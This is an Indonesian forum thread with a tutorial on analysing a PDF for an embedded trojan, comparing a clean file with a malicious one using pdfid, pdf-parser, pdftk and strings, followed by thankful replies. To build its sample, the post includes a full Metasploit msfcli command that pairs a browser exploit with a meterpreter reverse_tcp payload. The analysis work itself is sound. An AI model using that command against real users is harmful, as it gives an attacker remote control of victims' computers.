Indonesian Back|Track Team
Share Analysis PDF file contains a trojan - Printable Version

+- Indonesian Back|Track Team (https://www.indonesianbacktrack.or.id/forum)
+-- Forum: Attacker Zone (https://www.indonesianbacktrack.or.id/forum/forum-169.html)
+--- Forum: Malware - Malicious Software (https://www.indonesianbacktrack.or.id/forum/forum-151.html)
+--- Thread: Share Analysis PDF file contains a trojan (/thread-5597.html)

Pages: 1 2

Analysis PDF file contains a trojan - [H2] - 02-05-2014

Introduction !!!

Pada kesempatan ini saya akan menulis beberapa tahapan bagaimana menganalisa file dokumen *.PDF untuk menentukan Apakah dokumen tersebut berbahaya atau tidak.
Hal ini terjadi beberapa waktu lalu ketika saya mencoba untuk men-download sebuah e-book dan kemudian file tersebut terdeteksi oleh anti-virus yang saya gunakan. ini membuat saya menjadi curiga dan kemudian saya mencoba untuk menganalisa dokumen tersebut.
berikut beberapa langkah yang saya lakukan untuk menganalisis.

Saya akan melakukan perbandingan antara dokumen PDF yang bersih dengan dokumen yg di bungkus oleh trojan

Equipment :
1. pdfid
2. pdf-parser
3. pdftk. 'apt-get install pdftk'
4. strings

press thanks button Big Grin Big Grin

[hide]
pada tahap pertama saya akan menganalisa dokumen "analysis.pdf" yang tidak disisipi oleh trojan.
Spoiler! :

[Image: 1.png]


OK, now let's go it!

langkah pertamana untuk menampilkan value yang ada serta bahasa pendukung yang di munculkan dari dokumen diatas
Code:
# pdfid analysis.pdf
Spoiler! :

[Image: 1.png]


terlihat dari output yang ditampilkan kita hanya perlu memperhatikan baris JS / Java Script. diatas menunjukkan bahwa dokumen tersebut bebas dari adanya penyisipan trojan. terbukti nilai yang ditampilkan pada baris JS / Java Script adalah "0" berarti tidak ada text atau perintah dengan menggunakan script java.
jadi, itu berarti kita tidak perlu menganalisis lebih lanjut Smile

maka mari kita coba untuk menganalisa dokumen yang berisi trojan, dan di sini saya menggunakan metasploit untuk memanipulasi trojan menjadi dokumen pdf
Code:
# msfcli exploit/windows/browser/adobe_media_newplayer PAYLOAD=windows/meterpreter/reverse_tcp SRVHOST=192.168.1.3 SRVPORT=4455 URIPATH=/ LHOST=192.168.1.3 LPORT=4444 E
Spoiler! :

[Image: 2.png]


selanjutnya mendownload file tersebut.
Spoiler! :

[Image: 1.png]


pada gambar diatas terlihat versi yang di gunakan metasploit untuk membuat file *.pdf adalah versi 1.5.

selanjutnya melakukan hal yang sama pada tahap sebelumnya menggunakan perintah "pdfid"
Code:
# pdfid trojanPDF.pdf
Spoiler! :

[Image: 1.png]


terlihat pada baris JS/JavaScript memiliki value "1" yang berarti dalam dokumen tersebut terdapat perintah atau text menggunakan JavaScript.
selanjutnya menggunakan perintah "strings" untuk melihat JavaScript dalam bentuk text.
Code:
# strings trojanPDF.pdf
Spoiler! :

[Image: 1.png]


output pada gambar diatas terlihat tidak adanya JavaScript yang muncul dalam bentuk teks, ini mungkin merupakan upaya metasploit untuk mengenkripsi text java tersebut agar tidak mudah di temukan, hmm i like metasploit Wink

next, parse the PDF document
Code:
# pdf-parser -f trojanPDF.pdf
Spoiler! :

[Image: 1.png]


perintah diatas juga tidak bisa menemukan adanya baris Java Script. metasploit benar2 mengenkripsikan code tersebut upaya mempersulit analysis. salut deh buat metasploit >_<

tidak hanya sampai disini, berikut cara terakhir yang saya gunakan.
Di sini saya akan membuat duplikate dokumen dan menghapus semua pengkodean dokumen "trojanPDF.pdf" dan menyalinnya ke dokumen baru dengan nama "trojanPDF-2.pdf"
Code:
# pdftk trojanPDF.pdf output trojanPDF-2.pdf uncompress
Spoiler! :

[Image: 1.png]


setelah duplicate berhasil kita buat, kemudian gunakan perintah "strings" untuk menampilkan tampilan dokumen yg akan kita cetak.
Code:
# strings trojanPDF-2.pdf
Spoiler! :

[Image: 1.png]


yuhuuu, berhasil Smile
text java script berhasil muncul Smile dan jelas terlihat bahwa dokumen diatas memiliki infeksi trojan -_-"

# saran = hati-hati kalau mau download e-book apalagi dari sumber yang tidak jelas Smile

source
[/hide]

Regards IBTeam

Moved to:
/ Attacker Zone / Malware - Malicious Software v / Share - Analysis PDF file contains a trojan
by
iKONs

RE: Share - Analysis PDF file contains a trojan - xsteganography - 02-05-2014

Mantap ... Mau Ke TKP Dulu Praktek ....

RE: Share - Analysis PDF file contains a trojan - [H2] - 02-05-2014

(02-05-2014, 07:49 PM)xsteganography Wrote: Mantap ... Mau Ke TKP Dulu Praktek ....

Smile iya bang, langsung aja test satu2 e-book yang ada di simpen Smile
@iKONspirasi hehehe iya om, tadi sempet bingung juga sih mau naruk di mana Smile
makasih om Smile

RE: Analysis PDF file contains a trojan - zee eichel - 02-06-2014

nice one bro .. +2 rep ... ini sangat berguna untuk berjaga2 dari serangan trojan atau malware .. keep share bro

RE: Analysis PDF file contains a trojan - [H2] - 02-06-2014

(02-06-2014, 05:02 PM)zee eichel Wrote: nice one bro .. +2 rep ... ini sangat berguna untuk berjaga2 dari serangan trojan atau malware .. keep share bro

thanks bro mimin Big Grin cendol di terima Smile

RE: Analysis PDF file contains a trojan - san7 - 04-20-2014

ane baru tahu selain peepdf juga ada pdfid

RE: Analysis PDF file contains a trojan - iKONspirasi - 04-20-2014

wah pdftk buat uncompress pdf biar bisa decode kode yg disembunyikan, keren bro
+1 dari gw

RE: Analysis PDF file contains a trojan - [H2] - 04-20-2014

(04-20-2014, 06:03 PM)iKONspirasi Wrote: wah pdftk buat uncompress pdf biar bisa decode kode yg disembunyikan, keren bro
+1 dari gw

thanks om iKon Smile

RE: Analysis PDF file contains a trojan - Jeriko - 12-22-2015

Thanks info nya, ane baru tau PDF bisa disisipin trojan, tadi nya ane kira aman -_-

RE: Analysis PDF file contains a trojan - anongep8 - 12-25-2015

maaf om melenceng ^_^ , saya pake ubuntu 14.04.3 LTS , udh saya install metasploit framework terbaru, tapi waktu saya jalankan msfcli terjadi eror seperti ini [ http://prntscr.com/9iahpz ] , sudah saya cari solusi di forum ubuntu tidak ada, mohon bantuan'nya mas ^_^ #Thanks